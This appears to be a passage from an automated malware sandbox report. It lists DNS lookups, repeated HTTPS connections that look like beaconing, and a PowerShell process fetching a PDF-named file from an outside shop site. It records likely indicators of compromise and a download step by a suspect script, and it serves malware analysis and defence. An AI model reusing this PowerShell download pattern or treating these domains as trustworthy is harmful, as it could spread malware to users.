                                                                            Dec 5, 2024 10:39:40.070724964 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:40.071738958 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:44.213030100 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:44.213057041 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:44.213141918 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:44.213395119 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:44.213403940 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:45.634685993 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:45.634810925 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:45.636596918 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:45.636605978 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:45.639935970 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:45.640912056 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:45.687330961 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:46.172189951 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:46.172363043 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:46.172444105 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:46.172753096 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:50.182630062 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:50.182673931 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:50.182758093 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:50.182955980 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:50.182969093 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:51.442277908 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:51.443727016 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:51.443739891 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:51.901973009 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:51.902060032 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:51.902127028 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:51.902606964 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:55.916816950 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:55.916865110 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:55.916946888 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:55.917171001 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:55.917181015 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:57.318557024 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:57.319689035 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:57.319710970 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:57.866288900 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:57.866463900 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:57.866575956 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:57.866996050 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:01.867847919 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:01.867894888 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:01.868014097 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:01.868207932 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:01.868218899 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:03.129390001 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:03.130868912 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:03.130889893 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:03.590732098 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:03.590802908 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:03.590856075 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:03.591193914 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:07.588071108 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:07.588107109 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:07.588200092 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:07.588478088 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:07.588501930 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:08.986845016 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:08.988116980 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:08.988131046 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:09.532922029 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:09.533138037 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:09.533252001 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:09.558137894 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:13.617770910 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:13.617827892 CET44349720184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:13.618056059 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:13.618352890 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:13.618371964 CET44349720184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:14.880326986 CET44349720184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:14.895231009 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:14.895267963 CET44349720184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:15.340529919 CET44349720184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:15.340595007 CET44349720184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:15.340656042 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:15.341021061 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:19.368469954 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:19.368513107 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:19.368638992 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:19.368892908 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:19.368908882 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:20.768723011 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:20.769900084 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:20.769918919 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:21.345829010 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:21.346029997 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:21.346106052 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:21.346409082 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:25.355618954 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:25.355678082 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:25.355752945 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:25.356034040 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:25.356049061 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:26.617710114 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:26.619066000 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:26.619108915 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:27.078748941 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:27.078840017 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:27.078979969 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:27.079431057 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:31.101977110 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:31.102027893 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:31.102123022 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:31.102385044 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:31.102405071 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:32.500998020 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:32.505276918 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:32.505326033 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:33.049293041 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:33.049473047 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:33.049556017 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:33.050442934 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:37.057224989 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:37.057285070 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:37.057401896 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:37.057657957 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:37.057667971 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:38.321846008 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:38.323329926 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:38.323380947 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:38.819200993 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:38.819289923 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:38.819415092 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:38.819957018 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:42.837376118 CET49725443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:42.837420940 CET44349725148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:42.837641954 CET49725443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:42.837759972 CET49725443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:42.837769985 CET44349725148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:44.252140999 CET44349725148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:44.254000902 CET49725443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:44.254034042 CET44349725148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:44.797625065 CET44349725148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:44.797827959 CET44349725148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:44.797900915 CET49725443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:44.798347950 CET49725443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:48.806257963 CET49726443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:48.806313038 CET44349726184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:48.806416035 CET49726443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:48.806746960 CET49726443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:48.806771994 CET44349726184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:50.066502094 CET44349726184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:50.067816019 CET49726443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:50.067850113 CET44349726184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:50.526742935 CET44349726184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:50.526834011 CET44349726184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:50.526894093 CET49726443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:50.527801991 CET49726443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:54.524616957 CET49727443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:54.524669886 CET44349727148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:54.524770975 CET49727443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:54.525082111 CET49727443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:54.525098085 CET44349727148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:55.929753065 CET44349727148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:55.931210995 CET49727443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:55.931247950 CET44349727148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:56.478285074 CET44349727148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:56.478462934 CET44349727148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:56.478517056 CET49727443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:56.479249001 CET49727443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:41:00.479012966 CET49728443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:00.479069948 CET44349728184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:00.479171038 CET49728443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:00.479513884 CET49728443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:00.479528904 CET44349728184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:01.739466906 CET44349728184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:01.743737936 CET49728443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:01.743762970 CET44349728184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:02.200856924 CET44349728184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:02.200937033 CET44349728184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:02.201500893 CET49728443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:02.201931953 CET49728443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:06.212129116 CET49729443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:41:06.212182045 CET44349729148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:41:06.212367058 CET49729443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:41:06.215692997 CET49729443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:41:06.215708017 CET44349729148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:41:07.616424084 CET44349729148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:41:07.621014118 CET49729443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:41:07.621064901 CET44349729148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:41:08.164305925 CET44349729148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:41:08.164520979 CET44349729148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:41:08.164731979 CET49729443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:41:08.167681932 CET49729443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:41:12.183722019 CET49730443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:12.183770895 CET44349730184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:12.187840939 CET49730443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:12.191728115 CET49730443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:12.191776037 CET44349730184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:13.451148033 CET44349730184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:13.583740950 CET49730443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:20.580180883 CET44349730184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:20.580468893 CET49730443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:24.909977913 CET49730443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:24.910020113 CET44349730184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:24.911798000 CET49731443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:24.911837101 CET44349731184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:24.911982059 CET49731443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:24.912184000 CET49731443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:41:24.912193060 CET44349731184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:26.176070929 CET44349731184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:41:26.224365950 CET49731443192.168.2.9184.171.244.231

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 5, 2024 10:39:24.883579969 CET5194853192.168.2.91.1.1.1
                                                                            Dec 5, 2024 10:39:25.024419069 CET53519481.1.1.1192.168.2.9
                                                                            Dec 5, 2024 10:39:27.931627989 CET5203553192.168.2.91.1.1.1
                                                                            Dec 5, 2024 10:39:28.069765091 CET53520351.1.1.1192.168.2.9
                                                                            Dec 5, 2024 10:39:32.310028076 CET6096753192.168.2.91.1.1.1
                                                                            Dec 5, 2024 10:39:32.448858976 CET53609671.1.1.1192.168.2.9
                                                                            Dec 5, 2024 10:39:44.071896076 CET6086353192.168.2.91.1.1.1
                                                                            Dec 5, 2024 10:39:44.212044954 CET53608631.1.1.1192.168.2.9

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 5, 2024 10:39:24.883579969 CET192.168.2.91.1.1.10xcf95Standard query (0)www.fornid.comA (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:27.931627989 CET192.168.2.91.1.1.10x716fStandard query (0)www.pineappletech.aeA (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:32.310028076 CET192.168.2.91.1.1.10xfeb0Standard query (0)www.almrwad.comA (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:44.071896076 CET192.168.2.91.1.1.10x6db1Standard query (0)www.erp-royal-crown.infoA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 5, 2024 10:39:25.024419069 CET1.1.1.1192.168.2.90xcf95No error (0)www.fornid.comfornid.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:25.024419069 CET1.1.1.1192.168.2.90xcf95No error (0)fornid.com93.95.216.175A (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:28.069765091 CET1.1.1.1192.168.2.90x716fNo error (0)www.pineappletech.ae91.193.42.13A (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:32.448858976 CET1.1.1.1192.168.2.90xfeb0No error (0)www.almrwad.comalmrwad.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:32.448858976 CET1.1.1.1192.168.2.90xfeb0No error (0)almrwad.com184.171.244.231A (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:44.212044954 CET1.1.1.1192.168.2.90x6db1No error (0)www.erp-royal-crown.infoerp-royal-crown.infoCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:44.212044954 CET1.1.1.1192.168.2.90x6db1No error (0)erp-royal-crown.info148.251.114.233A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • www.fornid.com
                                                                            • www.pineappletech.ae
                                                                            • www.almrwad.com
                                                                            • www.erp-royal-crown.info

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.94970993.95.216.1754437372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:26 UTC116OUTGET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                            Host: www.fornid.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:27 UTC553INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:26 GMT
                                                                            Server: Apache
                                                                            P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
                                                                            Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisiM0e%2FK268mtgB%2FbNpOhPhr4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZKAr8c7Z1ao6vEvWxyuOg1g%3D000074; expires=Wed, 25-Dec-2024 09:39:26 GMT; Max-Age=1727999; path=/; domain=www.fornid.com; httponly
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Vary: Accept-Encoding
                                                                            Transfer-Encoding: chunked
                                                                            Content-Type: text/html; charset=utf-8
                                                                            2024-12-05 09:39:27 UTC7639INData Raw: 31 31 65 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 69 65 37 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 69 65 38 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69
                                                                            Data Ascii: 11e50<!DOCTYPE HTML>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7 " lang="it"><![endif]-->...[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="it"><![endif]-->...[if IE 8]><html class="no-js lt-ie9 ie8" lang="it"><![endif]-->...[i
                                                                            2024-12-05 09:39:27 UTC136INData Raw: 61 67 61 6d 65 6e 74 69 22 20 74 69 74 6c 65 3d 22 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 22 20 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 68 72 65 66 29 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 09 09 0a 09 0a 09 3c 2f 75 6c 3e 0a 0a 3c 2f 64 69 76 3e 0a 0a 3c 21 2d 2d 20 2f 42
                                                                            Data Ascii: agamenti" title="Come acquistare" onclick="window.open(this.href);return false;">Come acquistare</a></li></ul></div>... /B
                                                                            2024-12-05 09:39:27 UTC8192INData Raw: 6c 6f 63 6b 20 6c 69 6e 6b 73 20 6d 6f 64 75 6c 65 20 2d 2d 3e 0a 0a 09 3c 21 2d 2d 20 4d 65 6e 75 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 74 6d 5f 74 6f 70 6d 65 6e 75 22 3e 0d 0a 09 09 3c 68 34 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 5f 62 6c 6f 63 6b 22 3e 4d 65 6e 75 3c 2f 68 34 3e 0d 0a 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 74 72 65 65 20 64 68 74 6d 6c 22 3e 0d 0a 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 34 2d 75 74 65 6e 73 69 6c 69 2d 70 65 72 2d 6c 2d 69 6e 64 75 73 74 72 69 61 2d 65 2d 6c 2d 65 64 69 6c 69 7a 69 61 22 20 74 69 74 6c 65 3d 22 55 74 65 6e 73 69 6c 69 20 70 65 72 20 6c 27 69 6e 64 75 73 74 72 69 61 20 65 20 6c 27 65
                                                                            Data Ascii: lock links module -->... Menu --><div id="tm_topmenu"><h4 class="title_block">Menu</h4><ul class="tree dhtml"><li class=""><a href="https://www.fornid.com/4-utensili-per-l-industria-e-l-edilizia" title="Utensili per l'industria e l'e
                                                                            2024-12-05 09:39:27 UTC8192INData Raw: 62 72 69 66 69 63 61 6e 74 65 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 22 3e 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 2d 6f 6c 69 6f 2d 69 64 72 61 75 6c 69 63 6f 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 22 3e 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                                            Data Ascii: brificante" title="Olio lubrificante">Olio lubrificante</a><ul class="tm_subUL"><li class=""><a href="https://www.fornid.com/22-olio-idraulico" title="Olio idraulico ISO 32, 46 e 68">Olio idraulico ISO 32, 46 e 68</a></li><li class=""><a href="https://www
                                                                            2024-12-05 09:39:27 UTC8192INData Raw: 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 30 35 2d 72 61 63 63 6f 72 64 65 72 69 61 2d 69 6e 2d 6f 74 74 6f 6e 65 2d 75 73 6f 2d 63 69 76 69 6c 65 2d 69 6e 64 75 73 74 72 69 61 6c 65 2d 65 2d 70 65 72 2d 70 6f 6d 70 65 2d 69 64 72 61 75 6c 69 63 68 65 22 20 74 69 74 6c 65 3d 22 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69 64 72 61 75 6c 69 63 68 65 22 3e 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69
                                                                            Data Ascii: ><li class=""><a href="https://www.fornid.com/305-raccorderia-in-ottone-uso-civile-industriale-e-per-pompe-idrauliche" title="Raccorderia in ottone uso civile, industriale e per pompe idrauliche">Raccorderia in ottone uso civile, industriale e per pompe i
